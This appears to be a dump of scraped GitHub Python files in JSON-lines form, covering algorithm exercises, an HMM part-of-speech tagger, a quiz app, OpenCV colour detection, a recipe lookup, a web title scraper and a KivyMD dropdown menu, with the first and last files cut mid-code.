start:\n temp += s[first][second]\n for first in link:\n for second in link:\n temp -= s[first][second]\n if temp < 0:\n temp *= -1\n if min > temp:\n min = temp\nprint(min)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj14889.py","file_name":"boj14889.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44462403037","text":"# https://www.acmicpc.net/problem/2357\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\narr = [int(input()) for _ in range(N)]\ntotal_binary = len(bin(N)) - 3\nmin_arr = []\nmax_arr = []\nindex = 2\nwhile index <= 2 ** total_binary:\n a = []\n b = []\n for i in range(N - index + 1):\n a.append(min(min(arr[i:i+(index//2)]), min(arr[i+(index//2):i+index])))\n b.append(max(max(arr[i:i+(index//2)]), max(arr[i+(index//2):i+index])))\n min_arr.append(a)\n max_arr.append(b)\n index *= 2\nfor i in range(M):\n a, b = map(int, input().split())\n binary = len(bin(b - a + 1)) - 3\n c = min_arr[binary - 1]\n d = max_arr[binary - 1]\n min_num = min(c[a - 1], c[b - (2 ** binary)])\n max_num = max(d[a - 1], d[b - (2 ** binary)])\n print(min_num, max_num)","repo_name":"joohyun333/programmers","sub_path":"백준/구간트리(segment tree)/최소값과 최대값.py","file_name":"최소값과 최대값.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41956759338","text":"from collections import Counter\nimport pickle\nimport numpy as np\nimport argparse\n\n# python hmm.py ./test.txt -m HMM.pkl\n\n\ndef get_hmm(corpus=None, f=None, save=False, load=False, unk=False, unk_lim=10):\n\t\n\tHMM = dict()\n\n\tif load == True:\n\t\twith open(f, \"rb\") as fh:\n\t\t\tHMM = pickle.load(fh)\n\t\treturn HMM\n\t\n\tif corpus == None:\n\t\traise RuntimeError(\"Please enter a valid filename.\")\n\t\n\tfile = open(corpus, \"r\")\n\tdata = file.read().strip()\n\tsentences = data.split(\"\\n\\n\")\n\t\n\t\n\tA = dict()\n\tB = dict()\n\tpi = list()\n\n\tfor x in range(len(sentences)):\n\t\t\n\t\ts = sentences[x]\n\t\tobs = [toks.split(\"\\t\")[0] for toks in s.split(\"\\n\")]\n\t\ttags = [toks.split(\"\\t\")[1] for toks in s.split(\"\\n\")]\n\t\t\n\t\tpi.append(tags[0])\n\t\t\n\t\tfor i in range(0, len(tags) - 1):\n\t\t\tif tags[i] not in A:\n\t\t\t\tA[tags[i]] = list()\n\t\t\tA[tags[i]].append(tags[i+1])\n\t\t\t\n\t\t\tif tags[i] not in B:\n\t\t\t\tB[tags[i]] = list()\n\t\t\tB[tags[i]].append(obs[i])\n\t\n\tfor key in A:\n\t\tA[key] = Counter(A[key])\n\t\ttotal = sum(A[key].values())\n\n\tfor key in B:\n\t\tB[key] = Counter(B[key])\n\t\tif unk == True:\n\t\t\tB[key][\"UNK\"] = 0\n\t\t\tto_pop = list()\n\t\t\tfor s in B[key].keys():\n\t\t\t\tif B[key][s] < unk_lim:\n\t\t\t\t\tB[key][\"UNK\"] += B[key][s]\n\t\t\t\t\tto_pop.append(s)\n\t\t\tfor i in to_pop: B[key].pop(i)\n\n\t\n\t\n\tpi = Counter(pi)\n\ttotal_pi = sum(pi.values())\n\tfor p in pi:\n\t\tpi[p] = pi[p]/total_pi\n\t\n\tHMM[\"A\"] = A\n\tHMM[\"B\"] = B\n\tHMM[\"pi\"] = pi\n\t\n\tif save == True:\n\t\tpickle.dump(HMM, open(\"HMM.pkl\", \"wb\"), protocol=2)\n\t\n\treturn HMM\n\t \n\n\n\n\ndef decode(inp, HMM, smooth=True, k=1):\n\t# takes input as a list of tokens from sentence\n\t\n\tA = HMM[\"A\"]\n\tB = HMM[\"B\"]\n\tpi = HMM[\"pi\"]\n\t\n\tT = len(inp)\n\tQ = len(HMM[\"A\"].keys())\n\t\n\ttrellis = np.zeros((Q, T))\n\tbt = np.zeros((Q, T))\n\t\n\tmapping = dict()\n\ttags = list(A.keys())\n\tfor i in range(Q):\n\t\tmapping[i] = tags[i]\n\t\n\tfor i in range(Q):\n\t\ttrellis[i, 0] = pi[mapping[i]] * ((B[mapping[i]][inp[0]] + k) / (sum(B[mapping[i]].values()) + len(tags) * k))\n\t\tbt[i, 0] = 0\n\t\t\n\tfor j in range(1, T):\n\t\t\n\t\tfor i in range(Q):\n\t\t\t\n\t\t\ttrellis[i, j] = np.max([trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]][inp[j]] + k) / (sum(B[mapping[i]].values()) + Q * k)) if inp[j] in B[mapping[i]] else trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]]['UNK'] + k) / (sum(B[mapping[i]].values()) + Q * k)) for l in range(Q)])\n\t\t\tbt[i, j] = np.argmax([trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]][inp[j]] + k) / (sum(B[mapping[i]].values()) + Q * k)) if inp[j] in B[mapping[i]] else trellis[l, j-1] * ((A[mapping[l]][mapping[i]] + k) / (sum(A[mapping[l]].values()) + k * Q)) * ((B[mapping[i]]['UNK'] + k) / (sum(B[mapping[i]].values()) + Q * k)) for l in range(Q)])\n\t\n\t\n\t\n\tpath = list()\n\tmaxi = np.argmax([trellis[l, T - 1] * ((A[mapping[l]]['.'] + k)/(sum(A[mapping[l]].values()) + k * Q)) for l in range(Q)])\n\tpath.append(maxi)\n\ti = int(maxi)\n\tfor j in range(T - 1, 0, -1):\n\t\tpath = [int(bt[i, j])] + path\n\t\ti = int(bt[i, j])\n\treturn [mapping[s] for s in path] + [\".\"]\n\n\n\n\ndef training_acc(train_doc=None, HMM=None): \n\t\n\tif train_doc==None:\n\t\traise RuntimeError(\"Please enter a valid input document.\")\n\t\n\tif HMM==None:\n\t\traise RuntimeError(\"Please provide an HMM object.\")\n\t\t\n\tfh = open(train_doc, \"r\")\n\tdata = fh.read()\n\t\n\tsentences = data.split(\"\\n\\n\")\n\t\n\tcorrect = 0\n\ttotal = len(sentences)\n\t\n\tfor s in sentences:\n\t\t\n\t\ttags = [toks.split(\"\\t\")[1] for toks in s.split(\"\\n\")]\n\t\twords = [toks.split(\"\\t\")[0] for toks in s.split(\"\\n\")][:-1]\n\t\tprint(s)\n\t\tpredicted = decode(words, HMM)\n\t\t\n\t\tif decode == predicted: correct+=1\n\t\n\treturn correct / total\n\n\n\n\n\ndef predict(test_doc=None, HMM=None, out=None):\n\t\n\tif test_doc == None:\n\t\traise RuntimeError(\"Provide a valid test document.\")\n\t\n\tif HMM == None:\n\t\traise RuntimeError(\"Please provide an HMM object.\")\n\tfo = None\n\tif out != None:\n\t\tfo = open(out, \"a+\")\n\t\n\tfh = open(test_doc)\n\t\n\tdata = fh.read().strip()\n\t\n\tsentences = data.split(\"\\n\\n\")\n\t\n\tfor s in sentences:\n\t\t\n\t\twords = s.split(\"\\n\")\n\t\ttags = decode(words[:-1], HMM)\n\t\tstring = \"\"\n\t\tfor i in range(len(words)):\n\t\t\tstring = string + words[i] + \"\\t\" + tags[i] + \"\\n\"\n\t\t\n\t\t\n\t\tif out == None:\n\t\t\tprint(string)\n\t\telse:\n\t\t\tprint(string, file=fo)\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description=\"This is a simple HMM that \\\n\t\ttrains on an input document and can then decode a hidden sequence using \\\n\t\tthe Viterbi algorithm.\")\n\n\tparser.add_argument(\"input\", help=\"Path to test file in the prescribed format.\", type=str)\n\tgroup = parser.add_mutually_exclusive_group(required=True)\n\tgroup.add_argument(\"-m\", \"--model\", help=\"Path to pickled HMM.\", default=None)\n\tgroup.add_argument(\"-ts\", \"--train\", help=\"Path to Training corpus\", default=None)\n\tparser.add_argument(\"-u\", \"--unk\", help=\"Threshold for replacing emissions with 'UNK'. Default is 1\", default=1, type=int)\n\tparser.add_argument(\"-k\", help=\"k value for add-k smoothening. Default is 1\", default=1, type=int)\n\tparser.add_argument(\"-s\", \"--save\", help=\"Path where to save trained model. If set to Y then a file, 'HMM.pkl' is created in the current directory.\", default=0, choices=[0, 1], type=int)\n\tparser.add_argument(\"-o\", \"--out\", help=\"Where to output the result. Provide a filepath. By default, the output is displayed at stdout.\", default=None, type=str)\n\n\targs = parser.parse_args()\n\n\tHMM = None\n\n\tif args.input == None:\n\n\t\tparser.error(\"Must provide the test file as input.\")\n\n\tif args.train == None:\n\n\t\tHMM = get_hmm(f=args.model, load=True)\n\n\tif args.model == None:\n\n\t\tsave = False\n\t\tif args.save == 1: save = True\n\t\tHMM = get_hmm(corpus=args.train, save=save, unk=True, unk_lim=args.unk)\n\n\n\n\tpredict(HMM=HMM, out=args.out, test_doc=args.input)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"justachetan/nlp","sub_path":"assn4/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"34890984762","text":"# Sarah Moore\r\n# CS 553 - West Virginia University\r\n# Developing Portable Software\r\n#\r\n# Assignment 1: Quiz Generator\r\n#\r\n \r\nfrom questionFileReader import *\r\nfrom quizController import *\r\nfrom quizLogFileGenerator import *\r\nfrom quizUI import *\r\nimport time\r\nimport platform\r\nimport sys\r\nimport argparse\r\nfrom os.path import expanduser\r\nimport multiprocessing\r\n\r\nnumberOfQuestionsToAsk = 0\r\nreadFile = True\r\n\r\ndef printIntroMessage():\r\n print(\"Welcome to the Quiz Generator Application\")\r\n print(\"Author: Sarah Moore\")\r\n print(\"Version: 2.0.0\")\r\n print(\"Release Date: 03/26/2022\")\r\n print(\"\\n\\r\")\r\n\r\ndef obtainQuestionFile(path):\r\n global readFile\r\n try:\r\n readQuestionFile(path)\r\n except FileNotFoundError:\r\n print(\"Bad File name given (%s). Please Verify this path exists and try again.\", path)\r\n readFile=False\r\n print(\"\\n\\r\")\r\n\r\ndef obtainQuizInformation(numQuestion):\r\n numberOfQuestions = getNumberOfQuestions()\r\n global numberOfQuestionsToAsk\r\n numberOfQuestionsToAsk = numQuestion\r\n \r\n \r\n if numberOfQuestionsToAsk > numberOfQuestions:\r\n print(\"Questions requested on quiz is more than the input file. Will only ask \" + str(numberOfQuestions) + \" questions in the quiz.\")\r\n numberOfQuestionsToAsk = numberOfQuestions\r\n return\r\n \r\n if numberOfQuestionsToAsk < 0:\r\n numberOfQuestionsToAsk = 0\r\n return\r\n \r\n\r\ndef displayMetrics(tic, toc, correct, incorrect):\r\n global numberOfQuestionsToAsk\r\n\r\n percentCorrect = (correct / numberOfQuestionsToAsk) * 100\r\n percentInorrect = (incorrect / numberOfQuestionsToAsk) * 100\r\n\r\n print(\"Quiz Metrics\")\r\n print(\"Number of Questions Asked: \" + str(numberOfQuestionsToAsk))\r\n print(\"Percentage of Correct Answers: \" + str(percentCorrect))\r\n print(\"Percentage of Incorrect Answers: \" + str(percentInorrect))\r\n print(f\"Quiz duration: {toc - tic:0.4f} seconds\")\r\n\r\ndef getReadFile():\r\n\treturn readFile\r\n\r\ndef main():\r\n global numberOfQuestionsToAsk\r\n global readFile\r\n global numberOfCorrectAnswers\r\n global numberOfIncorrectAnswers\r\n my_os = platform.system()\r\n if (my_os == 'Linux'):\r\n # Arguments:\r\n # Question File Location (required)\r\n # Number of Questions to Ask (required)\r\n # Time Limit (optional)\r\n # Location of LogFile (optional)\r\n # Display past results (optional)\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--QuestionFilePath', type=str, help='The full file path to the question file.',required=True)\r\n parser.add_argument('--NumQuestions', type=int, help='The number of questions to be asked during the quiz. Note that if the number of questions exceedes the number of question in the file, then you will just be asked the max number of questions.',required=True)\r\n parser.add_argument('--TimeLimit', type=int, help='The time limit to take the generated quiz. If no input is given, then the quiz will run until the user completes it.',required=False, default=0)\r\n parser.add_argument('--DisplayPastResults', type=str, help='Whether or not to display past results. The default is not to.',required=False, choices=['y', 'n'], default='n')\r\n args = parser.parse_args()\r\n\r\n printIntroMessage()\r\n obtainQuestionFile(args.QuestionFilePath)\r\n if readFile == False:\r\n quit()\r\n \r\n obtainQuizInformation(args.NumQuestions)\r\n if numberOfQuestionsToAsk <= 0:\r\n quit()\r\n\r\n qlist = getQuestionList()\r\n numberOfCorrectAnswers = multiprocessing.Value('i', 0)\r\n numberOfIncorrectAnswers = multiprocessing.Value('i', 0)\r\n \r\n if(args.TimeLimit != 0):\r\n if(args.TimeLimit <= 0 ):\r\n quit()\r\n newstdin = os.fdopen(os.dup(sys.stdin.fileno()))\r\n lock = multiprocessing.Lock()\r\n lock.acquire()\r\n p = multiprocessing.Process(target=startQuiz, name=\"startQuiz\", args=(numberOfQuestionsToAsk,qlist, numberOfCorrectAnswers, numberOfIncorrectAnswers, newstdin))\r\n p.start()\r\n tic = time.perf_counter()\r\n \r\n while ( time.perf_counter() - tic <= args.TimeLimit ) :\r\n if p.is_alive():\r\n time.sleep(0.1)\r\n else:\r\n break\r\n lock.release()\r\n p.terminate()\r\n\r\n toc = time.perf_counter()\r\n displayMetrics(tic, toc, numberOfCorrectAnswers.value, numberOfIncorrectAnswers.value)\r\n else:\r\n tic = time.perf_counter()\r\n startQuiz(numberOfQuestionsToAsk, qlist, numberOfCorrectAnswers, numberOfIncorrectAnswers)\r\n toc = time.perf_counter()\r\n displayMetrics(tic, toc, numberOfCorrectAnswers.value, numberOfIncorrectAnswers.value)\r\n \r\n \r\n generateLogFile(numberOfCorrectAnswers.value, numberOfQuestionsToAsk, args.QuestionFilePath, '/home/smoore/.quizLogfile')\r\n if(args.DisplayPastResults == 'y'):\r\n viewUserData('/home/smoore/.quizLogfile')\r\n\r\n elif (my_os == 'Windows'):\r\n startWinApplication()\r\n else :\r\n sys.exit(\"Unsupported Operating System. Please run on either a Linux or Windows environment\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"thatsmorez/quiz-generator","sub_path":"quizGenerator.py","file_name":"quizGenerator.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39851648724","text":"row=int(input(\"Enter the number of rows : \"))\ncolumn=int(input(\"Enter the number of columns : \"))\nprint(\"Enter the matrix\")\nl=[]\nm=[]\nfor i in range(row):\n\tl=[int(x) for x in input().split(' ')]\n\tm.append(l)\n# Logic\nfor i in range(row):\n\tcol=0\n\tflag=False\n\tmin=m[i][0]\n\tfor j in range(column):\n\t\tif m[i][j]max:\n\t\t\tmax=m[k][col]\n\tprint('MAX = ',max)\n\tif max==min:\n\t\tflag=True\n\t\tbreak\t\nif flag:\n\tprint('SADDLE POINT = ',max)\nelse:\n\tprint('NO SADDLE POINT')","repo_name":"Mystery-2-Dev/Python_Programming","sub_path":"saddle_point_of_matrix.py","file_name":"saddle_point_of_matrix.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11441324083","text":"# Day 8\nclass Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n n = len(points)\n if n < 2:\n return n\n\n max_points = 0\n for i in range(n):\n point1 = points[i]\n same_point_count = 1\n same_slope_count = 0\n slopes = {}\n for j in range(i+1, n):\n point2 = points[j]\n # Check if the points have the same coordinates\n if point1[0] == point2[0] and point1[1] == point2[1]:\n same_point_count += 1\n continue\n # Calculate the slope of the line defined by the two points\n slope = None\n if point1[0] == point2[0]:\n slope = float('inf')\n else:\n slope = (point2[1] - point1[1]) / (point2[0] - point1[0])\n # Check if we have seen this slope before\n if slope in slopes:\n slopes[slope] += 1\n else:\n slopes[slope] = 1\n slopes['default'] = 0\n # Find the maximum number of points with the same slope\n same_slope_count = max(slopes.values())\n # Add the number of points with the same coordinates\n same_slope_count += same_point_count\n # Update the maximum number of points on a line\n max_points = max(max_points, same_slope_count)\n return max_points\n","repo_name":"aerengns/LeetCode","sub_path":"January-2023/Week2/Max-Points-On-a-Line.py","file_name":"Max-Points-On-a-Line.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2040285281","text":"import cv2 as cv\nimport mediapipe as mp\nimport time \nimport numpy as np \nimport opencv \nclass ColorDetection():\n def __init__(self):\n self.mycolors=[[5,107,0,19,255,255],\n [133,56,0,159,156,255],\n [57,76,0,100,255,255]] \n def findColor(self,image):\n hsv=cv.cvtColor(image,cv.COLOR_BGR2HSV)\n #lower=np.array(self.mycolors[0][0:3])\n #upper=np.array(self.mycolors[0][3:6])\n #mask=cv.inRange(hsv,lower,upper ) \n #cv.imshow('test',mask)\n for color in self.mycolors:\n lower=np.array(color[0:3])\n upper=np.array(color[3:6])\n mask=cv.inRange(hsv,lower,upper ) \n cv.imshow(str(color[0]),mask)\n#def main():\n# def empty(a):\n# pass \n# cv.namedWindow('TrackBars')\n# cv.resizeWindow('TrackBars',640,240)\n# cv.createTrackbar('Hue Min','TrackBars',0,179,empty)\n# cv.createTrackbar('Sat Min','TrackBars',0,255,empty)\n# cv.createTrackbar('Val Min','TrackBars',0,255,empty)\n# cv.createTrackbar('Hue Max','TrackBars',179,179,empty) \n# cv.createTrackbar('Sat Max','TrackBars',255,255,empty)\n# cv.createTrackbar('Val Max','TrackBars',255,255,empty) \n# while 1:\n# img=cv.imread('doaremon.jpg')\n# gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n# hsv=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n# h_min=cv.getTrackbarPos('Hue Min','TrackBars') \n# h_max=cv.getTrackbarPos('Hue Max','TrackBars') \n# s_min=cv.getTrackbarPos('Sat Min','TrackBars') \n# s_max=cv.getTrackbarPos('Sat Max','TrackBars') \n# v_min=cv.getTrackbarPos('Val Min','TrackBars') \n# v_max=cv.getTrackbarPos('Val Max','TrackBars') \n# lower=np.array([h_min,s_min,v_min])\n# upper=np.array([h_max,s_max,v_max])\n# mask=cv.inRange(hsv,lower,upper )\n# result=cv.bitwise_and(img,img,mask=mask)\n# #cv.imshow('human',img)\n# #cv.imshow('test',mask)\n# cv.imshow('result',result)\n# cv.waitKey(1)\ndef main():\n pTime=0\n cap=cv.VideoCapture(0)\n CD=ColorDetection()\n while 1:\n success,img=cap.read()\n CD.findColor(img)\n cv.imshow('Result',img)\n cv.waitKey(1)\n if cv.waitKey(20)& 0xFF==ord('d'):\n break\n cap.release()\n cv.destroyAllWindows()\nif __name__ == \"__main__\":\n main()\n","repo_name":"Shengpy/Open-CV","sub_path":"test2/Color_Detection.py","file_name":"Color_Detection.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40824640714","text":"import json\n\n\n# find all possible recipes that can be made with the current ingredients\ndef recipe_find(ingredients):\n\n # store the recipes from the json file as a list\n with open(\"recipebook.json\", encoding=\"utf8\") as read_file:\n data = json.load(read_file)\n\n recipes = data[\"recipes\"]\n\n matches = []\n\n # eliminate human error\n ingredients = list(map(str.lower, ingredients))\n ingredients = list(map(str.strip, ingredients))\n\n count = 0\n\n # add a recipe to matches if the user has the correct ingredients\n for x in recipes:\n count = len(x[\"ingredients\"])\n x[\"ingredients\"] = list(map(str.lower, x[\"ingredients\"]))\n c = all(i in ingredients for i in x[\"ingredients\"])\n if c is True:\n matches.append([x,0])\n else:\n # prioritize recipes in ascending order based on number of missing ingredients\n for y in x[\"ingredients\"]:\n if y in ingredients:\n count -= 1\n matches.append([x, count])\n\n matches.sort(key=lambda z: z[1])\n matches = [q for q in matches if q[1] < 4]\n return matches[:3]\n\n\n# find the YouTube thumbnail based on the link of the video\ndef thumbnail(url):\n str = \"https://img.youtube.com/vi/___/0.jpg\"\n\n newStr = str.replace(\"___\", url[30:])\n\n return newStr\n\n\n# find the information of a recipe based on the name\ndef reverse_lookup(name):\n with open(\"recipebook.json\", encoding=\"utf8\") as read_file:\n data = json.load(read_file)\n\n recipes = data[\"recipes\"]\n\n for x in recipes:\n if x[\"name\"] == name:\n return x","repo_name":"jeetajmani/nwHacks-Jan2021","sub_path":"recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36156839649","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError, URLError\nfrom bs4 import BeautifulSoup\n\ndef getTitulo(url):\n ## TRATANTO ERROS COM URL\n try:\n html = urlopen(url)\n except HTTPError as erro:\n print(\"{ª_ª} Erro de HTTP: \",erro)\n return None\n except URLError as erro:\n print(\"{º_º} Erro na url: \",erro),\n return None\n except:\n print(\" {/\\ __ /\\ } Erro gato triste \")\n return None\n ## TRATANTO ERROS COM beautifulsoup\n try:\n bsObj = BeautifulSoup(html.read(),\"html.parser\")\n titulo = bsObj.body.h1\n except AttributeError as erro:\n print(\"eRRO NA TAG H1\\n:\",erro)\n return None\n return titulo\n\ntitulo = getTitulo(input(\"informe url: \"))\n\nif titulo is not None:\n print(titulo)\nelse:\n print(\"Titulo não exonctroado\")","repo_name":"juanengml/web-scraping-python","sub_path":"usando beautifulsoup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20986463529","text":"import os\nimport logging\n\nanaconda = input('Do you have anaconda installed ?')\n\nif (anaconda.lower() == 'yes') or (anaconda.lower() == 'y'):\n os.system('conda create --name doc_search_env python=3.9')\n os.system('conda activate doc_search_env')\n os.system('pip install -r requirements.txt')\n\nelse:\n # logging.error('install anaconda first, It will be easy to install the environment in that case')\n print(\"\\033[91m {}\\033[00m\".format(\"install anaconda first, It will be easy to install thnoe environment in that case \\n\"))\n print(\"\\033[92m {}\\033[00m\".format(\"After installing Anaconda run this script again!! \\n\"))\n # logging.info('After installing Anaconda run this script again!!')\n","repo_name":"ap539813/Document-Search-Engine-Web-Application","sub_path":"set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22958585986","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 23:59:02 2019\n\n@author: Nidhi\n\"\"\"\n\n#import nltk\nimport numpy as np\nimport random\nimport string\noutput=[]\nf=open('training.txt','r', errors='ignore').read().split('\\n')\ntrain_X=[]\ntrain_Y=[]\nfor line in f:\n idx=line.find('\\t')\n train_X.append(line[:idx])\n train_Y.append(line[idx+1:])\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nTfidfVec=TfidfVectorizer(stop_words='english')\n\ntfidf=TfidfVec.fit_transform(train_X)\n#Y=TfidfVec.fit_transform(train_Y)\nfrom sklearn.ensemble import RandomForestClassifier\nmodel = RandomForestClassifier(n_estimators=20,random_state=0)\n#Y=np.asarray()\nmodel.fit(tfidf, train_Y)\nuser_input=input()\nproduct=[]\n\nfor i in range(int(user_input)):\n user_input1=input()\n product.append(user_input1)\noutput=[]\nfor line in product:\n \n output.append(model.predict(TfidfVec.transform([line])))\nfor out in output:\n print(out+'\\n')\n \n ","repo_name":"nidhiupreti99/NLP-Challenges","sub_path":"challenge_1/Guess The flipkart query.py","file_name":"Guess The flipkart query.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951569386","text":"from encoder import LstmEncoder\n\n\ndef test_encoder():\n encoder = LstmEncoder(\n num_features=80,\n hidden_size=1024,\n proj_size=512,\n output_dim=512,\n subsampling_factor=4,\n num_encoder_layers=12,\n )\n num_params = sum(p.numel() for p in encoder.parameters() if p.requires_grad)\n print(num_params)\n # 93979284\n # 66427392\n\n\ndef main():\n test_encoder()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"egs/librispeech/ASR/transducer_lstm/test_encoder.py","file_name":"test_encoder.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"39604410890","text":"from kivy.metrics import dp\nfrom kivy.properties import ObjectProperty, OptionProperty, ListProperty, NumericProperty, StringProperty, ColorProperty # @UnresolvedImport\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.graphics.vertex_instructions import Line # @UnresolvedImport\nfrom kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\n\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.list import IRightBodyTouch, OneLineListItem, OneLineAvatarIconListItem, OneLineRightIconListItem\nfrom kivymd.uix.behaviors import HoverBehavior\n\nimport kivymd.material_resources as m_res\n\n#------------------------------------------------------------------------------\n\nfrom components import screen\n\n#------------------------------------------------------------------------------\n\n_Debug = False\n\n#------------------------------------------------------------------------------\n\nclass DropdownMenuItemBase(HoverBehavior):\n\n def on_enter(self):\n self.parent.parent.drop_cls.set_bg_color_items(self)\n self.parent.parent.drop_cls.dispatch(\"on_enter\", self)\n\n def on_leave(self):\n self.parent.parent.drop_cls.dispatch(\"on_leave\", self)\n\n\nclass DropdownMenuItem(DropdownMenuItemBase, OneLineListItem):\n pass\n\n\nclass DropdownMenuItemIcon(DropdownMenuItemBase, OneLineAvatarIconListItem):\n icon = StringProperty()\n\n\nclass DropdownMenuItemRight(DropdownMenuItemBase, OneLineRightIconListItem):\n pass\n\n\nclass DropdownRightContent(IRightBodyTouch, MDBoxLayout):\n text = StringProperty()\n icon = StringProperty()\n\n\nclass BaseMenu(ScrollView):\n width_mult = NumericProperty(1)\n drop_cls = ObjectProperty()\n\n\nclass BaseDropdownMenu(ThemableBehavior, FloatLayout):\n\n selected_color = ColorProperty(None)\n items = ListProperty()\n width_mult = NumericProperty(1)\n max_height = NumericProperty()\n border_margin = NumericProperty(\"4dp\")\n ver_growth = OptionProperty(None, allownone=True, options=[\"up\", \"down\"])\n hor_growth = OptionProperty(None, allownone=True, options=[\"left\", \"right\"])\n background_color = ColorProperty(None)\n opening_transition = StringProperty(\"out_cubic\")\n opening_time = NumericProperty(0.2)\n caller = ObjectProperty()\n position = OptionProperty(\"auto\", options=[\"auto\", \"center\", \"bottom\"])\n radius = ListProperty([dp(7), ])\n _start_coords = []\n _calculate_complete = False\n _calculate_process = False\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n Window.bind(on_resize=self.check_position_caller)\n Window.bind(on_maximize=self.set_menu_properties)\n Window.bind(on_restore=self.set_menu_properties)\n self.register_event_type(\"on_dismiss\")\n self.register_event_type(\"on_enter\")\n self.register_event_type(\"on_leave\")\n self.register_event_type(\"on_release\")\n self.target_height = 0\n\n def check_position_caller(self, instance, width, height):\n self.set_menu_properties(0)\n\n def set_bg_color_items(self, instance_selected_item):\n if self.selected_color:\n for item in self.ids.md_menu.ids.box.children:\n if item is not instance_selected_item:\n item.bg_color = (0, 0, 0, 0)\n else:\n instance_selected_item.bg_color = self.selected_color\n\n def set_menu_properties(self, interval=0):\n if self.caller:\n if _Debug:\n print('BaseDropdownMenu.set_menu_properties', self.ids.md_menu, type(self.ids.md_menu))\n if not self.ids.md_menu.ids.box.children:\n self.create_menu_items()\n # We need to pick a starting point, see how big we need to be,\n # and where to grow to.\n self._start_coords = self.caller.to_window(\n self.caller.center_x, self.caller.center_y\n )\n self.target_width = self.width_mult * m_res.STANDARD_INCREMENT\n\n # If we're wider than the Window...\n if self.target_width > Window.width:\n # ...reduce our multiplier to max allowed.\n self.target_width = (\n int(Window.width / m_res.STANDARD_INCREMENT)\n * m_res.STANDARD_INCREMENT\n )\n\n # Set the target_height of the menu depending on the size of\n # each MDMenuItem or MDMenuItemIcon\n self.target_height = 0\n for item in self.ids.md_menu.ids.box.children:\n self.target_height += item.height\n\n # If we're over max_height...\n if 0 < self.max_height < self.target_height:\n self.target_height = self.max_height\n\n # Establish vertical growth direction.\n if self.ver_growth is not None:\n ver_growth = self.ver_growth\n else:\n # If there's enough space below us:\n if (\n self.target_height\n <= self._start_coords[1] - self.border_margin\n ):\n ver_growth = \"down\"\n # if there's enough space above us:\n elif (\n self.target_height\n < Window.height - self._start_coords[1] - self.border_margin\n ):\n ver_growth = \"up\"\n # Otherwise, let's pick the one with more space and adjust ourselves.\n else:\n # If there\"s more space below us:\n if (\n self._start_coords[1]\n >= Window.height - self._start_coords[1]\n ):\n ver_growth = \"down\"\n self.target_height = (\n self._start_coords[1] - self.border_margin\n )\n # If there's more space above us:\n else:\n ver_growth = \"up\"\n self.target_height = (\n Window.height\n - self._start_coords[1]\n - self.border_margin\n )\n\n if self.hor_growth is not None:\n hor_growth = self.hor_growth\n else:\n # If there's enough space to the right:\n if (\n self.target_width\n <= Window.width - self._start_coords[0] - self.border_margin\n ):\n hor_growth = \"right\"\n # if there's enough space to the left:\n elif (\n self.target_width\n < self._start_coords[0] - self.border_margin\n ):\n hor_growth = \"left\"\n # Otherwise, let's pick the one with more space and adjust ourselves.\n else:\n # if there\"s more space to the right:\n if (\n Window.width - self._start_coords[0]\n >= self._start_coords[0]\n ):\n hor_growth = \"right\"\n self.target_width = (\n Window.width\n - self._start_coords[0]\n - self.border_margin\n )\n # if there\"s more space to the left:\n else:\n 